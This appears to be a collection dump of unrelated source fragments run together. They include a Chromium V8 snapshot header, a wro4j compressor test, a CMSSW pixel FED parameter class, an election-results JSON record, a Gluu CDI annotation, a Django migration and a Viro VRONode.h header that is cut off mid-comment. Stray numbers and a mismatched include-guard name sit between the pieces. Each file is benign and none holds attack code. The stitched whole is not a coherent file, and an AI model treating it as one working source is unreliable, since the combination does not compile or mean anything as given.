COMPONENTS_CLOUD_DEVICES_COMMON_CLOUD_DEVICE_DESCRIPTION_H_
535
575
// Copyright 2017 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_BINDINGS_MODULES_V8_V8_CONTEXT_SNAPSHOT_EXTERNAL_REFERENCES_H_ #define THIRD_PARTY_BLINK_RENDERER_BINDINGS_MODULES_V8_V8_CONTEXT_SNAPSHOT_EXTERNAL_REFERENCES_H_ #include <cstdint> #include "third_party/blink/renderer/modules/modules_export.h" #include "third_party/blink/renderer/platform/wtf/allocator/allocator.h" namespace blink { // V8ContextSnapshotExternalReferences::GetTable() provides a table of pointers // of C++ callbacks exposed to V8. The table contains C++ callbacks for DOM // attribute getters, setters, DOM methods, wrapper type info etc. class MODULES_EXPORT V8ContextSnapshotExternalReferences { STATIC_ONLY(V8ContextSnapshotExternalReferences); public: // The definition of this method is auto-generated in // v8_context_snapshot_external_references.cc. static const intptr_t* GetTable(); }; } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_BINDINGS_MODULES_V8_V8_CONTEXT_SNAPSHOT_EXTERNAL_REFERENCES_H_
406
517
/*
 * Copyright (c) 2008. All rights reserved.
 */
package ro.isdc.wro.extensions.processor;

import java.io.File;
import java.io.IOException;
import java.net.URL;

import org.junit.Test;

import ro.isdc.wro.extensions.processor.js.DojoShrinksafeCompressorProcessor;
import ro.isdc.wro.model.resource.ResourceType;
import ro.isdc.wro.model.resource.processor.ResourcePostProcessor;
import ro.isdc.wro.util.WroTestUtils;

/**
 * Test Dojo Shrinksafe compressor processor.
 *
 * @author <NAME>
 * @created Created on Nov 6, 2010
 */
public class TestDojoShrinksafeCompressorProcessor {
  @Test
  public void testFromFolder() throws IOException {
    final ResourcePostProcessor processor = new DojoShrinksafeCompressorProcessor();
    // Expected outputs live next to this test class under "dojo/expected".
    // NOTE(review): inputs are taken from the classpath-global "test" resource
    // root rather than from the "dojo" folder itself — confirm that is the
    // intended fixture layout.
    final URL url = getClass().getResource("dojo");
    final File testFolder = new File(ClassLoader.getSystemResource("test").getFile());
    final File expectedFolder = new File(url.getFile(), "expected");
    // Compress every *.js input and compare against the pre-generated file.
    WroTestUtils.compareFromDifferentFoldersByExtension(testFolder, expectedFolder, "js", processor);
  }

  @Test
  public void shouldSupportCorrectResourceTypes() {
    // The processor must advertise support for JS resources.
    WroTestUtils.assertProcessorSupportResourceTypes(new DojoShrinksafeCompressorProcessor(), ResourceType.JS);
  }
}
395
852
<reponame>ckamtsikis/cmssw #include "CalibFormats/SiPixelObjects/interface/PixelFEDParameters.h" #include <ostream> using namespace pos; PixelFEDParameters::PixelFEDParameters() { fednumber_ = 0; crate_ = 0; vmebaseaddress_ = 0; } PixelFEDParameters::~PixelFEDParameters() {} unsigned int PixelFEDParameters::getFEDNumber() const { return fednumber_; } unsigned int PixelFEDParameters::getCrate() const { return crate_; } unsigned int PixelFEDParameters::getVMEBaseAddress() const { return vmebaseaddress_; } void PixelFEDParameters::setFEDParameters(unsigned int fednumber, unsigned int crate, unsigned int vmebaseaddress) { fednumber_ = fednumber; crate_ = crate; vmebaseaddress_ = vmebaseaddress; } void PixelFEDParameters::setFEDNumber(unsigned int fednumber) { fednumber_ = fednumber; } void PixelFEDParameters::setCrate(unsigned int crate) { crate_ = crate; } void PixelFEDParameters::setVMEBaseAddress(unsigned int vmebaseaddress) { vmebaseaddress_ = vmebaseaddress; } std::ostream& pos::operator<<(std::ostream& s, const PixelFEDParameters& pFEDp) { s << "FED Number:" << pFEDp.fednumber_ << std::endl; s << "Crate Number:" << pFEDp.crate_ << std::endl; s << "VME Base Address:" << pFEDp.vmebaseaddress_ << std::endl; return s; }
430
348
<reponame>chamberone/Leaflet.PixiOverlay<filename>docs/data/leg-t1/041/04102084.json {"nom":"<NAME>","circ":"2ème circonscription","dpt":"Loir-et-Cher","inscrits":804,"abs":329,"votants":475,"blancs":2,"nuls":2,"exp":471,"res":[{"nuance":"LR","nom":"<NAME>","voix":200},{"nuance":"REM","nom":"<NAME>","voix":92},{"nuance":"FN","nom":"Mme <NAME>","voix":88},{"nuance":"FI","nom":"<NAME>","voix":41},{"nuance":"SOC","nom":"<NAME>","voix":23},{"nuance":"ECO","nom":"Mme <NAME>","voix":6},{"nuance":"DIV","nom":"<NAME>","voix":5},{"nuance":"COM","nom":"<NAME>","voix":4},{"nuance":"DVD","nom":"Mme <NAME>","voix":4},{"nuance":"DLF","nom":"Mme <NAME>","voix":4},{"nuance":"ECO","nom":"Mme <NAME>","voix":3},{"nuance":"EXG","nom":"Mme <NAME>","voix":1}]}
309
380
package org.gluu.oxauth.model.event;

import javax.enterprise.util.AnnotationLiteral;
import javax.inject.Qualifier;
import java.lang.annotation.Documented;
import java.lang.annotation.Retention;
import java.lang.annotation.Target;

import static java.lang.annotation.ElementType.*;
import static java.lang.annotation.RetentionPolicy.RUNTIME;

/**
 * CDI qualifier annotation; by its name it marks events/observers related to
 * the crypto provider (presumably its (re)configuration — confirm at the
 * fire/observe sites).
 *
 * @author <NAME>
 */
@Qualifier
@Retention(RUNTIME)
@Target({ METHOD, FIELD, PARAMETER, TYPE })
@Documented
public @interface CryptoProviderEvent {

    /**
     * {@link AnnotationLiteral} so the qualifier can be supplied
     * programmatically (e.g. when selecting or firing CDI events).
     */
    final class Literal extends AnnotationLiteral<CryptoProviderEvent> implements CryptoProviderEvent {

        public static final CryptoProviderEvent.Literal INSTANCE = new CryptoProviderEvent.Literal();

        private static final long serialVersionUID = 1L;

    }

}
248
1,392
# Generated by Django 3.2.13 on 2022-04-29 09:47 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ("checkout", "0046_alter_checkout_line_pk"), ("warehouse", "0027_alter_reservation_models_checkout_line"), ] operations = [ migrations.AlterField( model_name="preorderreservation", name="checkout_line_token", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="checkout.checkoutline" ), ), migrations.AlterField( model_name="reservation", name="checkout_line_token", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="checkout.checkoutline" ), ), migrations.RemoveField( model_name="preorderreservation", name="checkout_line", ), migrations.RemoveField( model_name="reservation", name="checkout_line", ), migrations.RenameField( model_name="preorderreservation", old_name="checkout_line_token", new_name="checkout_line", ), migrations.RenameField( model_name="reservation", old_name="checkout_line_token", new_name="checkout_line", ), migrations.AlterField( model_name="preorderreservation", name="checkout_line", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="preorder_reservations", to="checkout.checkoutline", ), ), migrations.AlterField( model_name="reservation", name="checkout_line", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="reservations", to="checkout.checkoutline", ), ), ]
1,077
1,851
<reponame>yoelhawa/viro // // VRONode.h // ViroRenderer // // Created by <NAME> on 11/15/15. // Copyright © 2015 Viro Media. All rights reserved. // // Permission is hereby granted, free of charge, to any person obtaining // a copy of this software and associated documentation files (the // "Software"), to deal in the Software without restriction, including // without limitation the rights to use, copy, modify, merge, publish, // distribute, sublicense, and/or sell copies of the Software, and to // permit persons to whom the Software is furnished to do so, subject to // the following conditions: // // The above copyright notice and this permission notice shall be included // in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. // IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY // CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, // TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE // SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
#ifndef VRONode_h #define VRONode_h #include <memory> #include <stack> #include <vector> #include <string> #include <set> #include <algorithm> #include <functional> #include "optional.hpp" #include "VROAtomic.h" #include "VROMatrix4f.h" #include "VROQuaternion.h" #include "VRORenderContext.h" #include "VRODriver.h" #include "VRORenderParameters.h" #include "VROAnimatable.h" #include "VROBoundingBox.h" #include "VROSortKey.h" #include "VROLog.h" #include "VROEventDelegate.h" #include "VROSound.h" #include "VROFrustumBoxIntersectionMetadata.h" #include "VROThreadRestricted.h" #include "VROPhysicsBody.h" class VROGeometry; class VROLight; class VROScene; class VROTaskQueue; class VROAction; class VROTexture; class VROPortal; class VROMorpher; class VRONodeCamera; class VROHitTestResult; class VROConstraint; class VROExecutableAnimation; class VROTransformDelegate; class VROTransaction; class VRORenderMetadata; class VROParticleEmitter; class VROSkeletalAnimationLayer; class VROSkinner; class VROIKRig; extern bool kDebugSortOrder; extern int kDebugSortOrderFrameFrequency; extern const std::string kDefaultNodeTag; enum class VRONodeType { Normal, Portal, PortalFrame, }; enum class VROSilhouetteMode { Flat, // Render silhouettes with constant lighting, no textures Textured, // Render silhouettes with constant lighting and textures }; enum class VRODragType { // Drags objects with a fixed distance to camera/controller/etc, from the point at which // the user has grabbed the geometry containing this draggable node. FixedDistance, // Drags objects with a fixed distance to camera/controller/etc, from the point of this // node's position in world space. FixedDistanceOrigin, // Drags object along a given plane (point + normal) FixedToPlane, // Currently available to AR only. Attempts to drag object w.r.t. the real world. 
FixedToWorld, }; class VRONode : public VROAnimatable, public VROThreadRestricted { public: static void resetDebugSortIndex(); #pragma mark - Initialization /* Default constructor. */ VRONode(); /* Copy constructor. This copies the node but *not* the underlying geometries or lights. Instead, these are shared by reference with the copied node. Additionally, this constructor will not copy child nodes. To copy child nodes recursively, invoke the clone() function. */ VRONode(const VRONode &node); virtual ~VRONode(); /* Delete any rendering resources. Invoked prior to destruction, on the rendering thread. Recurses down the tree. */ virtual void deleteGL(); /* Copy constructor that recursively copies all child nodes. This copies the node but *not* the underlying geometries or lights. Instead, these are shared by reference with the copied node. */ std::shared_ptr<VRONode> clone(); /* Get a unique ID for this VRONode. */ int getUniqueID() { return _uniqueID; } #pragma mark - Render Cycle /* Recursive function that recomputes the transforms of this node. This includes: _worldTransform, _worldRotation, _worldPosition, _worldBoundingBox */ void computeTransforms(VROMatrix4f parentTransform, VROMatrix4f parentRotation); /* Sets both the local position and rotation of this node in terms of world coordinates. A computeTransform pass is then performed to update the node's bounding boxes and as well as its child's node transforms recursively. The animated flag should be false in most cases because of the recursive computeTransform pass. */ void setWorldTransform(VROVector3f finalPosition, VROQuaternion finalRotation, bool animated = false); /* Update the visibility status of this node, using the camera in the current render context. This will update the _visible flag. Recurses to children. */ void updateVisibility(const VRORenderContext &context); /* Update the particle emitters attached to this node. Recurses to children. 
*/ void updateParticles(const VRORenderContext &context); /* Recursively applies transformation constraints (e.g. billboarding) to this node and its children. */ void applyConstraints(const VRORenderContext &context, VROMatrix4f parentTransform, bool parentUpdated); /* Update the position of each light in this node, and add to the outLights vector. Recurses down the tree. */ void collectLights(std::vector<std::shared_ptr<VROLight>> *outLights); /* Recursively updates the sort keys of this node, preparing this node and its children for rendering. This method also computes non-transform-related parameters for each node (opacity, lights, etc.) that are required prior to render, and outputs metadata about the forthcoming render to VRORenderMetadata. Note: this method and getSortKeys() *only* apply to visible nodes. Invisible nodes are skipped. */ void updateSortKeys(uint32_t depth, VRORenderParameters &params, std::shared_ptr<VRORenderMetadata> &metadata, const VRORenderContext &context, std::shared_ptr<VRODriver> &driver); /* Get the sort keys for all visible nodes in this portal. Stops the search when we reach the hit of the scene graph or hit another portal. */ void getSortKeysForVisibleNodes(std::vector<VROSortKey> *outKeys); /* Render the given element of this node's geometry, using its latest computed transforms. */ void render(int elementIndex, std::shared_ptr<VROMaterial> &material, const VRORenderContext &context, std::shared_ptr<VRODriver> &driver); /* Recursively render this node and all of its children, with full texture and lighting. Note: this method does not intelligently batch or sort. It is is less efficient than directly calling render(..) above after proper sorting. */ void render(const VRORenderContext &context, std::shared_ptr<VRODriver> &driver); /* Recursively render this the silhouette of this node and all of its children. Lighting is fixed at constant, and the given material is used for all elements. 
If mode is set to Textured, then textures will be bound. This method is typically used to render to the stencil or depth buffers only. The filter is used to only render the silhouettes of specific objects. Returns true on each node to render, false to not. Either way we continue down the tree recursively. */ void renderSilhouettes(std::shared_ptr<VROMaterial> &material, VROSilhouetteMode mode, std::function<bool(const VRONode&)> filter, const VRORenderContext &context, std::shared_ptr<VRODriver> &driver); /* This function recomputes this node's transform before recomputing its umbrella bounding box using its parent's last computed transform. */ void recomputeUmbrellaBoundingBox(); #pragma mark - Geometry void setGeometry(std::shared_ptr<VROGeometry> geometry) { passert_thread(__func__); _geometry = geometry; } std::shared_ptr<VROGeometry> getGeometry() const { return _geometry; } void setIKRig(std::shared_ptr<VROIKRig> rig) { _IKRig = rig; } std::shared_ptr<VROIKRig> getIKRig() { return _IKRig; } /* Called during a render pass to perform a full IK calculation on the rig attached to this node. */ void computeIKRig(); #pragma mark - Camera void setCamera(std::shared_ptr<VRONodeCamera> camera) { passert_thread(__func__); _camera = camera; } const std::shared_ptr<VRONodeCamera> &getCamera() const { return _camera; } #pragma mark - Transforms VROVector3f getWorldPosition() const; VROMatrix4f getWorldRotation() const; VROMatrix4f getWorldTransform() const; VROVector3f getPosition() const { return _position; } VROVector3f getScale() const { return _scale; } VROQuaternion getRotation() const { return _rotation; } VROVector3f getRotationEuler() const { return _euler; } /* The following are atomic, updated once per frame on the rendering thread. They can be accessed safely from any thread to get an up-to-date state of the transform. 
*/ VROMatrix4f getLastWorldTransform() const; VROVector3f getLastWorldPosition() const; VROMatrix4f getLastWorldRotation() const; VROVector3f getLastLocalPosition() const; VROVector3f getLastLocalScale() const; VROQuaternion getLastLocalRotation() const; VROMatrix4f getLastScalePivot() const; VROMatrix4f getLastRotationPivot() const; VROBoundingBox getLastWorldUmbrellaBoundingBox() const; VROBoundingBox getLastLocalUmbrellaBoundingBox() const; VROBoundingBox getLastLocalBoundingBox() const; /* The atomic geometry bounding box is set on the application thread as soon as a geometry is set for this Node. */ void setLastGeometryBoundingBox(VROBoundingBox bounds); /* Set the rotation, position, or scale. Animatable. */ void setRotation(VROQuaternion rotation); void setPosition(VROVector3f position); void setScale(VROVector3f scale); void setTransformDelegate(std::shared_ptr<VROTransformDelegate> delegate); /* Set the rotation as a vector of Euler angles. Using this method will update the Euler angles stored internally in a predictable way. Setting rotation by quaternion updates Euler angles in an unpredictable way (i.e. the quaternion axis may change). */ void setRotationEuler(VROVector3f euler); /* These piecewise setters are used in order to change one axis only, without altering the remaining axes. Useful when animating across multiple axes across separate calls. Animatable. */ void setPositionX(float x); void setPositionY(float y); void setPositionZ(float z); void setScaleX(float x); void setScaleY(float y); void setScaleZ(float z); void setRotationEulerX(float radians); void setRotationEulerY(float radians); void setRotationEulerZ(float radians); /* Pivot points define the center for rotation and scale. For example, by translating the rotation pivot, you can use rotation to rotate an object about a faraway point. By translating the scale pivot, you can scale an object relative to its corner, instead of its center. Not animatable. 
*/ void setRotationPivot(VROMatrix4f pivot); void setScalePivot(VROMatrix4f pivot); /* Get the bounding box and the umbrella bounding box. The former is the bounding box of just this node and its geometry; the latter is the union of this node's bounding box and that of all of its child nodes, descending recurisvely down the scene graph. */ VROBoundingBox getBoundingBox() const; VROBoundingBox getUmbrellaBoundingBox() const; #pragma mark - Application Thread Properties // Viro platforms (e.g. ViroCore) in general set properties on the main thread and dispatch those setters // to the rendering thread. This maintains thread-safety (and speed) because we don't // interfere with the ongoing render cycle when setting variables. However, it's common that // the user wants to set something on the application thread and then immediately invoke some // computation utilizing said variable, before it's been synchronized with the rendering // thread. For this reason we copy all relevant fields from VRONode into std::atomic variables. // These variables can be accessed from any thread. This way, we: // // 1. Maintain speed on the rendering thread (e.g. we don't have to lock or deal with atomics) // 2. Maintain access of this data across threads // // In other words, these atomic fields are *duplicates* of rendering thread fields, but are // accessible from the application thread. They are set in two ways: // // 1. By the application, via any atomic setter, from the application thread. // 2. By the renderer, via automatic sync with the rendering thread counterparts, // once per frame. This mode of update is required because the renderer itself // changes these variables through internal processes like physics and animation. // The atomic setters below will immediately update all of a node's related application // thread properties. 
For example, node->setPositionAtomic() will immediately update the // application thread's world transform, so that it can be used for other calculations on // the application thread. These setters will *dispatch* to the rendering thread to set the // corresponding rendering thread properties. void setPositionAtomic(VROVector3f position); void setRotationAtomic(VROQuaternion rotation); void setScaleAtomic(VROVector3f scale); void setScalePivotAtomic(VROMatrix4f scalePivot); void setRotationPivotAtomic(VROMatrix4f rotationPivot); /* Must be invoked for this node and its children (all the way down the scene graph) whenever atomic position, scale, scale pivot, rotation, or rotation pivot are set. Computes _lastWorldTransform, _lastWorldPosition, _lastWorldRotation, and _lastWorldBoundingBox, on this node only. Requires the latest data from this node's parent to make the computations. This does not recurse down the scene graph on its own because we do not have access to an application thread copy of the scene graph. ViroCore does have such a copy in Java-land, so it handles the recursive invocation of this method. */ void computeTransformsAtomic(VROMatrix4f parentTransform, VROMatrix4f parentRotation); /* Helper functions used to update the _lastWorldUmbrellaBoundingBox of the given node with the world bounds of _this_ node; that is, the bounds of this node will be union-ed with the bounds of the given node. Return the transform needed for the next recursion. */ void startComputeAtomicUmbrellaBounds(); VROMatrix4f computeAtomicUmbrellaBounds(std::shared_ptr<VRONode> parentNodeBeingUpdated, VROMatrix4f transform); void endComputeAtomicUmbrellaBounds(); /* Recursively sync the application thread properties with the latest values from the rendering thread. Called on the rendering thread after the transform computation occurs in the render cycle. Dispatches to the application thread. 
*/ void syncAppThreadProperties(); #pragma mark - Render Settings std::string getName() const { return _name; } void setName(std::string name) { _name = name; } float getOpacity() const { return _opacity; } void setOpacity(float opacity); virtual bool isHidden() const { return _hidden; } virtual void setHidden(bool hidden); int getRenderingOrder() const { return _renderingOrder; } void setRenderingOrder(int renderingOrder) { _renderingOrder = renderingOrder; } bool isHierarchicalRendering() const { return _hierarchicalRendering; } void setHierarchicalRendering(bool hierarchicalRendering) { _hierarchicalRendering = hierarchicalRendering; } /* True to stop rendering of this node and all of its children until the model load callbacks are finished. Used internally. */ void setHoldRendering(bool hold) { _holdRendering = hold; } /* Returns true if this node was found visible during the last call to computeVisibility(). If a node is not visible, that means none of its children are visible either (we use the umbrella bounding box for visibility tests). */ bool isVisible() const { return _visible; } /* Debug function to count the number of visible nodes (including this node if visible, then recursively descending from this node's children) since the last call to computeVisibility(). 
*/ int countVisibleNodes() const; #pragma mark - Particle Emitters void setParticleEmitter(std::shared_ptr<VROParticleEmitter> emitter); void removeParticleEmitter(); std::shared_ptr<VROParticleEmitter> getParticleEmitter() const; #pragma mark - Lights void addLight(std::shared_ptr<VROLight> light) { passert_thread(__func__); _lights.push_back(light); } void removeLight(std::shared_ptr<VROLight> light) { passert_thread(__func__); _lights.erase( std::remove_if(_lights.begin(), _lights.end(), [light](std::shared_ptr<VROLight> candidate) { return candidate == light; }), _lights.end()); } void removeAllLights() { passert_thread(__func__); _lights.clear(); } std::vector<std::shared_ptr<VROLight>> &getLights() { return _lights; } const std::vector<std::shared_ptr<VROLight>> &getComputedLights() const { return _computedLights; } uint32_t getComputedLightsHash() const { return _computedLightsHash; } void setLightReceivingBitMask(int bitMask, bool recursive = false) { _lightReceivingBitMask = bitMask; if (recursive) { for (std::shared_ptr<VRONode> &child : _subnodes) { child->setLightReceivingBitMask(bitMask, recursive); } } } int getLightReceivingBitMask() const { return _lightReceivingBitMask; } void setShadowCastingBitMask(int bitMask, bool recursive = false) { _shadowCastingBitMask = bitMask; if (recursive) { for (std::shared_ptr<VRONode> &child : _subnodes) { child->setShadowCastingBitMask(bitMask, recursive); } } } int getShadowCastingBitMask() const { return _shadowCastingBitMask; } #pragma mark - Sounds void addSound(std::shared_ptr<VROSound> sound) { passert_thread(__func__); if (sound->getType() == VROSoundType::Spatial) { _sounds.push_back(sound); } } void removeSound(std::shared_ptr<VROSound> sound) { passert_thread(__func__); _sounds.erase( std::remove_if(_sounds.begin(), _sounds.end(), [sound](std::shared_ptr<VROSound> candidate) { return candidate == sound; }), _sounds.end()); } void removeAllSounds() { passert_thread(__func__); _sounds.clear(); } #pragma 
mark - Scene Graph void addChildNode(std::shared_ptr<VRONode> node); void removeFromParentNode(); /* Return a copy of the subnode list. */ std::vector<std::shared_ptr<VRONode>> getChildNodes() const; /* Remove all children from this node. */ void removeAllChildren(); /* Return the parent node. Null if this node is root or does not have a parent. */ std::shared_ptr<VRONode> getParentNode() const { return _supernode.lock(); } /* Get the parent scene of this VRONode. If this node is not attached to the scene graph, this will return null. */ std::shared_ptr<VROScene> getScene() const { return _scene.lock(); } /* Returns a vec of skinners associated with this node. If recurse is true, we also examine recursively down the subtree and return any found skinners as well. */ void getSkinner(std::vector<std::shared_ptr<VROSkinner>> &skinnerOut, bool recurse); /* Set the parent scene of this node. Internal use only. */ void setScene(std::shared_ptr<VROScene> scene, bool recursive); /* Returns the type of this node. Faster then dynamic_cast. */ VRONodeType getType() const { return _type; } /* Get the nearest portal that's an ancestor of this node. Returns null if this is the root node. */ const std::shared_ptr<VROPortal> getParentPortal() const; /* Get the nearest child portals of this node. This recurses down the graph in all directions, stopping whenever we hit a portal or the end of the graph. */ void getChildPortals(std::vector<std::shared_ptr<VROPortal>> *outPortals) const; #pragma mark - Actions and Animations /* Actions enable open-ended and fully customizable manipulation of nodes over successive frames. */ void runAction(std::shared_ptr<VROAction> action); void removeAction(std::shared_ptr<VROAction> action); void removeAllActions(); /* Animations enable structured manipulation of nodes over successive frames. They can be as simple interpolating batches of properties over time, or as complex as full skeletal animation. These methods take a key parameter. 
Keys identify animations that run together in a single transaction; e.g., there can be multiple animations with a single key. removeAnimation will remove *all* animations with the given key. */ void addAnimation(std::string key, std::shared_ptr<VROExecutableAnimation> animation); void removeAnimation(std::string key); /* Get the keys for all animations in this node. If recursive is true, will search down the hierarchy as well. */ std::set<std::string> getAnimationKeys(bool recursive); /* Retrieve all animations with the given key, as a single, composite executable animation. If recursive is true, then this will return a new parallel VROAnimationChain that contains every animation in this node and every animation in any subnode that shares the same key. For example, if the animation 'Take 001' contains a torso animation and an arm animation, both will be returned in a single animation group. */ std::shared_ptr<VROExecutableAnimation> getAnimation(std::string key, bool recursive); /* Retrieve all the animations with the given keys as a single, composite executable animation. If multiple animations influence the same bone, the provided weights determine how the animations blend. If recursive is true, this will search subnodes for animations as well. For example, if the animation 'Body' and the animation 'LeftArm' contain torso and left arm animations, both will be returned in a single animation group. If both animations move the left arm, their influences on the left arm will be blended. */ std::shared_ptr<VROExecutableAnimation> getLayeredAnimation(std::vector<std::shared_ptr<VROSkeletalAnimationLayer>> layers, bool recursive); /* Remove all animations from this node. */ void removeAllAnimations(); /* Triggered when the animation running this animatable node completes. */ void onAnimationFinished(); /* Returns a set of VROMorphers containing all morph targets that are associated with this node. If recursive is true, we will search down the node hierarchy as well. 
*/ std::set<std::shared_ptr<VROMorpher>> getMorphers(bool recursive); #pragma mark - Events std::vector<VROHitTestResult> hitTest(const VROCamera &camera, VROVector3f origin, VROVector3f ray, bool boundsOnly = false); void setSelectable(bool selectable) { _selectable = selectable; } void setEventDelegate(std::shared_ptr<VROEventDelegate> delegate) { passert_thread(__func__); _eventDelegateWeak = delegate; } std::shared_ptr<VROEventDelegate> getEventDelegate() { if (_eventDelegateWeak.expired()){ return nullptr; } return _eventDelegateWeak.lock(); } bool isSelectable() const { return _selectable; } void setIgnoreEventHandling(bool canHandle) { _ignoreEventHandling = canHandle; for (std::shared_ptr<VRONode> childNode : getChildNodes()){ childNode->setIgnoreEventHandling(canHandle); } } bool getIgnoreEventHandling() const { return _ignoreEventHandling; } void setTag(std::string tag) { _tag = tag; } std::string getTag() const { return _tag; } void setHighAccuracyEvents(bool enabled); bool getHighAccuracyEvents() const { return _highAccuracyEvents; } void setIsBeingDragged(bool isDragging) { std::shared_ptr<VROPhysicsBody> physicsBody = getPhysicsBody(); if (physicsBody != nullptr) { physicsBody->setKinematicDrag(isDragging); } } void setDragType(VRODragType dragType) { _dragType = dragType; } VRODragType getDragType() { return _dragType; } void setDragPlanePoint(VROVector3f point) { _dragPlanePoint = point; } VROVector3f getDragPlanePoint() { return _dragPlanePoint; } void setDragPlaneNormal(VROVector3f normal) { _dragPlaneNormal = normal; } VROVector3f getDragPlaneNormal() { return _dragPlaneNormal; } void setDragMaxDistance(float maxDistance) { _dragMaxDistance = maxDistance; } float getDragMaxDistance() { return _dragMaxDistance; } bool isAnimatingDrag() { return _isAnimatingDrag; } void setIsAnimatingDrag(bool isAnimatingDrag) { _isAnimatingDrag = isAnimatingDrag; } std::shared_ptr<VROTransaction> getDragAnimation() { return _dragAnimation; } void 
setDragAnimation(std::shared_ptr<VROTransaction> dragAnimation) { _dragAnimation = dragAnimation; } #pragma mark - Constraints void addConstraint(std::shared_ptr<VROConstraint> constraint); void removeConstraint(std::shared_ptr<VROConstraint> constraint); void removeAllConstraints(); #pragma mark - Physics std::shared_ptr<VROPhysicsBody> initPhysicsBody(VROPhysicsBody::VROPhysicsBodyType type, float mass, std::shared_ptr<VROPhysicsShape> shape); std::shared_ptr<VROPhysicsBody> getPhysicsBody() const; void clearPhysicsBody(); #pragma mark - Task Queues void addTaskQueue(std::shared_ptr<VROTaskQueue> queue); void removeTaskQueue(std::shared_ptr<VROTaskQueue> queue); protected: VRONodeType _type; /* The node's parent and children. */ std::vector<std::shared_ptr<VRONode>> _subnodes; std::weak_ptr<VRONode> _supernode; /* The VROScene to which this node belongs. */ std::weak_ptr<VROScene> _scene; /* The geometry in the node. Null means the node has no geometry. */ std::shared_ptr<VROGeometry> _geometry; /* The inverse kinematic rig associated with this node, set when this node is considered the root node joint of the rig. */ std::shared_ptr<VROIKRig> _IKRig; /* True if this node was found visible during the last call to computeVisibility(). */ bool _visible; /* Last frame that this node was visited during sorting. Used for graph traversal. */ int _lastVisitedRenderingFrame; private: /* Name for debugging. */ std::string _name; /* Unique identifier. */ int _uniqueID; /* Lights, sound, particles, and camera. */ std::vector<std::shared_ptr<VROLight>> _lights; std::vector<std::shared_ptr<VROSound>> _sounds; std::shared_ptr<VROParticleEmitter> _particleEmitter; std::shared_ptr<VRONodeCamera> _camera; /* Scale and position. */ VROVector3f _scale; VROVector3f _position; /* Rotation is stored as a quaternion, but we also maintain euler angles for use in animation (since we cannot additively rotate by reading euler angles from a quaternion and writing them again). 
*/ VROQuaternion _rotation; VROVector3f _euler; /* Pivots define the center of the rotation and scale operations. Declared optional becuase they are not always used, and we can optimize them away when not used. */ std::experimental::optional<VROMatrix4f> _rotationPivot; std::experimental::optional<VROMatrix4f> _rotationPivotInverse; std::experimental::optional<VROMatrix4f> _scalePivot; std::experimental::optional<VROMatrix4f> _scalePivotInverse; /* User-defined rendering order for this node. */ int _renderingOrder; /* Parameters computed by descending down the tree. These are updated whenever any parent or this node itself is updated. For example, computedOpacity is the opacity of this node multiplied by the opacities of all this node's ancestors. Similarly, worldTransform is the full cascaded transformation matrix for the node. worldRotation only takes into account rotations (not scale or translation). computedLights are the lights that influence this node, based on distance from the light and light attenuation, unrelated to the scene graph (e.g. the lights in _computedLights may belong to any node in the scene). localTransform only takes into the account the transformations of _this_ node. */ VROMatrix4f _localTransform; VROMatrix4f _worldTransform; VROMatrix4f _worldInverseTransposeTransform; VROMatrix4f _worldRotation; VROVector3f _worldPosition; float _computedOpacity; std::vector<std::shared_ptr<VROLight>> _computedLights; uint32_t _computedLightsHash; std::weak_ptr<VROTransformDelegate> _transformDelegate; /* Application-thread copies of the node's transform data. See the 'Application Thread Properties' pragma above for a more extensive description of why we need these fields. The following are computed fields (not directly set by users). 
*/ VROAtomic<VROMatrix4f> _lastLocalTransform; VROAtomic<VROMatrix4f> _lastWorldTransform; VROAtomic<VROVector3f> _lastWorldPosition; VROAtomic<VROMatrix4f> _lastWorldRotation; /* Bounding boxes are either defined in world or local coordinates, and encapsulate either _this_ node only, or this node and all children (umbrella). */ VROAtomic<VROBoundingBox> _lastWorldBoundingBox; VROAtomic<VROBoundingBox> _lastLocalBoundingBox; VROAtomic<VROBoundingBox> _lastGeometryBoundingBox; VROAtomic<VROBoundingBox> _lastLocalUmbrellaBoundingBox; VROAtomic<VROBoundingBox> _lastWorldUmbrellaBoundingBox; bool _lastUmbrellaBoundsSet; /* Directly-set application thread properties. */ VROAtomic<VROVector3f> _lastPosition; VROAtomic<VROVector3f> _lastScale; VROAtomic<VROQuaternion> _lastRotation; VROAtomic<VROMatrix4f> _lastScalePivot, _lastScalePivotInverse; VROAtomic<VROMatrix4f> _lastRotationPivot, _lastRotationPivotInverse; VROAtomic<bool> _lastHasScalePivot; VROAtomic<bool> _lastHasRotationPivot; /* The bounding box containing this node's geometry, in both local and world coordinates. The umbrella variant encompasses not only this geometry, but the geometries of all this node's children. The geometry bounding box is the bounding box for the geometry without any transforms applied, while the local bounding box is the bounding box with local transforms applied. */ VROBoundingBox _geometryBoundingBox; // No transforms VROBoundingBox _localBoundingBox; // Local transforms VROBoundingBox _worldBoundingBox; // World transforms VROBoundingBox _localUmbrellaBoundingBox; VROBoundingBox _worldUmbrellaBoundingBox; VROFrustumBoxIntersectionMetadata _umbrellaBoxMetadata; /* True if this node is hidden. Hidden nodes are not rendered, and do not respond to tap events. Hiding a node within an animation results in a fade-out animation. The _opacityFromHiddenFlag is the opacity as derived from _hidden: 0.0 if _hidden is true, 1.0 if _hidden is false, or somewhere in-between during animation. 
